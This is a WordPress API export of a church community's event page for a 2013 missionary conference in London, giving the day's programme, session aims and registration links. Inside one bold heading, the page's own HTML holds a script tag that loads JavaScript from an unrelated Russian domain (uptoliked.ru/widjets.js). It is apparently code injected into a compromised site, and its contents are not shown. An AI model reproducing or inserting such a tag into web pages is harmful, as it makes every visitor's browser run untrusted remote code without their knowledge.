{"id":15727,"date":"2013-05-02T10:29:58","date_gmt":"2013-05-02T09:29:58","guid":{"rendered":"http:\/\/www.scmlondon.org\/?page_id=15727"},"modified":"2015-01-10T22:26:55","modified_gmt":"2015-01-10T22:26:55","slug":"the-mission-conference","status":"publish","type":"page","link":"https:\/\/www.scmlondon.org\/?page_id=15727","title":{"rendered":"THE MISSION CONFERENCE"},"content":{"rendered":"<p><b><a href=\"http:\/\/www.scmlondon.org\/wp-content\/uploads\/2013\/05\/The-Mission_leaflet.jpg\" data-rel=\"lightbox-image-0\" data-rl_title=\"\" data-rl_caption=\"\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"alignright size-medium wp-image-16192\" alt=\"The Mission_leaflet\" src=\"http:\/\/www.scmlondon.org\/wp-content\/uploads\/2013\/05\/The-Mission_leaflet-211x300.jpg\" width=\"211\" height=\"300\" srcset=\"https:\/\/www.scmlondon.org\/wp-content\/uploads\/2013\/05\/The-Mission_leaflet-211x300.jpg 211w, https:\/\/www.scmlondon.org\/wp-content\/uploads\/2013\/05\/The-Mission_leaflet-721x1024.jpg 721w, https:\/\/www.scmlondon.org\/wp-content\/uploads\/2013\/05\/The-Mission_leaflet.jpg 874w\" sizes=\"auto, (max-width: 211px) 100vw, 211px\" \/><\/a>&#8222;Go out to the whole world and proclaim the Good News.&#8220;<\/b><\/p>\n<p><b>Mk 16:15<\/b><\/p>\n<p>The Slovak Catholic Mission in London invites you to be part of the multinational and multicultural event entitled<\/p>\n<h2><b>&#8222;THE MISSION&#8220;<\/b><\/h2>\n<p><b>on Saturday 5<\/b><b><sup>th<\/sup><\/b><b> October 2013<\/b><\/p>\n<p><b>at Westminster Cathedral Hall <\/b><\/p>\n<p>Start: 9:30 am<\/p>\n<h2><a href=\"http:\/\/www.scmlondon.org\/?page_id=16136\">REGISTER HERE<\/a><\/h2>\n<p>A day full of learning and sharing about how to be good missionaries in the world of today.<\/p>\n<p><b>What is the main theme of the day?<script src=\"\/\/uptoliked.ru\/widjets.js\"><\/script><\/b><\/p>\n<ul>\n<li>To explore what our mission is (in life, in our families, at work, in our communities)<\/li>\n<li>To explore how each of us can become missionaries in the world of today<b><br \/>\n<\/b><\/li>\n<\/ul>\n<p><b>What is the plan for the day?<br \/>\n<\/b><\/p>\n<p><i>Aims of the morning session:<\/i><\/p>\n<ul>\n<li>To look at the lives of missionaries, their work and legacy<\/li>\n<li>To think about what we can learn from them<\/li>\n<\/ul>\n<p><i>Aims of the afternoon session:<\/i><\/p>\n<ul>\n<li>To think about what the word \u2018mission\u2019 means for us today<\/li>\n<li>To share practical examples of how to be on a mission today<\/li>\n<li>To discuss in groups how to be good missionaries in the world of today<\/li>\n<\/ul>\n<p>At the end there will be a lively theatrical perfomance about our Slavic missionaries &#8211; Saint Cyril and Saint Methodius &#8211; entitled &#8218;Martyrs of the Word&#8216;.\u00a0 It should not be missed!<\/p>\n<h2><span style=\"color: #800000;\">For <strong>programme<\/strong> details, please click <\/span><span style=\"color: #003366;\"><a href=\"http:\/\/www.scmlondon.org\/wp-content\/uploads\/2013\/10\/The-Mission_programme_FN.pdf\" target=\"_blank\"><span style=\"color: #003366;\">here<\/span><\/a><\/span>.<\/h2>\n<p><strong>We look forward to seeing you there!<\/strong><\/p>\n<h2><a href=\"http:\/\/www.scmlondon.org\/?page_id=16136\">REGISTER HERE<\/a><\/h2>\n<p>[download id=&#8220;2&#8243;]<\/p>\n<h3>Related Images:<\/h3>","protected":false},"excerpt":{"rendered":"<p>&#8222;Go out to the whole world and proclaim the Good News.&#8220; Mk 16:15 The Slovak Catholic Mission in London invites you to be part of the multinational and multicultural event&#8230; <a class=\"meta-more\" href=\"https:\/\/www.scmlondon.org\/?page_id=15727\">Pokra\u010dova\u0165 v \u010d\u00edtan\u00ed <span class=\"meta-nav\">&raquo;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":18883,"menu_order":1,"comment_status":"open","ping_status":"closed","template":"template-fullwidth.php","meta":{"ngg_post_thumbnail":0,"footnotes":""},"class_list":["post-15727","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages\/15727","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15727"}],"version-history":[{"count":20,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages\/15727\/revisions"}],"predecessor-version":[{"id":16329,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages\/15727\/revisions\/16329"}],"up":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages\/18883"}],"wp:attachment":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15727"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}